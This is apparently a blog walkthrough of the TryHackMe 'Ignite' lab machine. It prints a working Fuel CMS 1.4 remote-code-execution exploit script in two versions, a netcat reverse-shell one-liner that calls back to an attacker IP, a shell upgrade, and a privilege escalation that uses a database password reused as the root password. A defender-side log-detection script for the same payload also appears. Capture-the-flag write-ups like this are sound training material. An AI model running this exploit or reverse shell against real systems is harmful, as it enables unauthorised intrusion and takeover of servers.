TryHackMe | Ignite

Technicalhats
4 min read, Aug 9, 2020

This is my 2nd blog post in a series of blogs. I will be publishing all Boot to Root machines that I solve from various platforms like Hackthebox, Vulnhub, TryHackMe, etc.

Ignite is a straightforward box. It runs a vulnerable CMS that lets an attacker gain an initial shell, and further enumeration then leads to root. Let's get started.

Reconnaissance

Starting with a simple nmap scan to see which ports are open and what services are running on them.

nmap -sC -sV -O -oA simple_scan 10.10.75.216
  • -sC: run default nmap scripts
  • -sV: detect service version
  • -O: detect OS
  • -oA: output in all formats, saved to files named simple_scan

Going back to the results, only one port is open, port 80, and Fuel CMS is installed on it.

Enumeration

Open the URL in a browser.

http://10.10.75.216/

Let's check whether Fuel CMS version 1.4 has any public exploits available.

Bingo. Fuel CMS version 1.4 has a remote code execution vulnerability. Download the code and save it.

# Python 2 script: sends the command in the 'filter' parameter and prints the
# output that the server echoes before the page body
import requests
import urllib

url = "http://127.0.0.1:8881"

def find_nth_overlapping(haystack, needle, n):
    # position of the n-th occurrence of needle in haystack (-1 if absent)
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    xxxx = raw_input('cmd:')
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    # requests are routed through a local proxy (Burp on 127.0.0.1:8080)
    proxy = {"http":"http://127.0.0.1:8080"}
    r = requests.get(burp0_url, proxies=proxy)

    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)

    # the response starts repeating once the command output ends; print up to that point
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)

    print r.text[0:dup]

The exploit code seemed a bit complicated to me because, in order to run it and get results successfully, we need to set up a proxy. So I decided to tweak the code a bit so that it works without setting up a proxy, and saved it.

# Python 2 script: same as above, but the proxy has been removed and the
# target URL points at the box
import requests
import urllib

url = "http://10.10.75.216"

def find_nth_overlapping(haystack, needle, n):
    # position of the n-th occurrence of needle in haystack (-1 if absent)
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    xxxx = raw_input('cmd:')
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"

    r = requests.get(burp0_url)

    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)

    # the response starts repeating once the command output ends; print up to that point
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)

    print r.text[0:dup]
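As an added, defender-side example (not part of the original post or of the exploit), the following Python 3 script decodes the filter parameter of /fuel/pages/select requests in web-server access logs and flags the assign-and-call pattern the exploit injects. The log lines are constructed, and the pattern also covers a few other PHP command-execution functions beyond the one the exploit uses.

```python
"""Detection helper (Python 3): flag Fuel CMS 1.4 'filter' RCE attempts in access logs."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache combined log format (not real traffic).
# The first one carries the same encoded filter parameter as the exploit above.
SAMPLE_LOG = """\
10.8.13.70 - - [09/Aug/2020:10:15:01 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27id%27%29%2b%27 HTTP/1.1" 200 1532 "-" "python-requests/2.24.0"
10.8.13.70 - - [09/Aug/2020:10:15:09 +0000] "GET /fuel/pages/select/?filter=home HTTP/1.1" 200 912 "-" "Mozilla/5.0"
10.10.75.1 - - [09/Aug/2020:10:16:30 +0000] "GET /fuel/ HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

# Decoded, the payload is PHP that stores a function name such as 'system' in a
# variable and then calls it; match that assign-and-call shape rather than one literal.
PAYLOAD_RE = re.compile(
    r"\+\s*\w+\s*\(\s*print\s*\(\s*\$\w+\s*=\s*'(system|exec|shell_exec|passthru)'", re.I)

def decode_filter(target):
    """Return the URL-decoded 'filter' parameter of a /fuel/pages/select request, else None."""
    parts = urlsplit(target)
    if not parts.path.startswith("/fuel/pages/select"):
        return None
    values = parse_qs(parts.query).get("filter")
    if not values:
        return None
    # parse_qs already decoded one layer; a second pass catches double-encoded payloads.
    return unquote(values[0])

def find_rce_attempts(log_text):
    """Return (source_ip, timestamp, decoded_filter) for each request matching the payload."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        decoded = decode_filter(m.group("target"))
        if decoded is not None and PAYLOAD_RE.search(decoded):
            hits.append((m.group("src"), m.group("ts"), decoded))
    return hits

if __name__ == "__main__":
    for src, ts, payload in find_rce_attempts(SAMPLE_LOG):
        print(f"[{ts}] {src} -> filter={payload!r}")
```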

Before running the exploit, let’s set up our netcat listener on port 7896.

nc -lvp 7896

Now run the exploit in a different tab and enter the following command to get a reverse shell.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.8.13.70 7896 > /tmp/f

On executing the payload, we get a reverse shell on the netcat listener we set up earlier.

Upgrade the obtained shell to bash using the following command.

python -c 'import pty; pty.spawn("/bin/bash")'

We have successfully upgraded our shell to bash. Now let's explore the machine. In the www-data directory, we find flag.txt.

With this, half of the challenge is complete. But the main objective is to obtain root access and the root.txt file, so let's dig deeper.

Privilege Escalation

I ran a couple of enumeration scripts but got nothing interesting. So I started looking around at background processes, but again found nothing.

After looking around for a little bit, I found this: if you remember, at the start of our enumeration phase, the default page on port 80 contains an installation guide which includes the path of the database configuration file.

Let's navigate to that path and see if it holds any juicy information that can give us root access.

cd /var/www/html/fuel/application/config
cat /var/www/html/fuel/application/config/database.php

Bingo, we have obtained the root password from the 'database.php' file: the database password is reused as the root password. Now log in with the found credentials using the following command.

su root

Now that we have successfully obtained root, in order to complete this challenge we have to submit the content of root.txt. The content of the flag can be obtained with the following command.

cat /root/root.txt

We have completed Ignite on TryHackMe. Thank you for staying till the end; feedback is always appreciated.
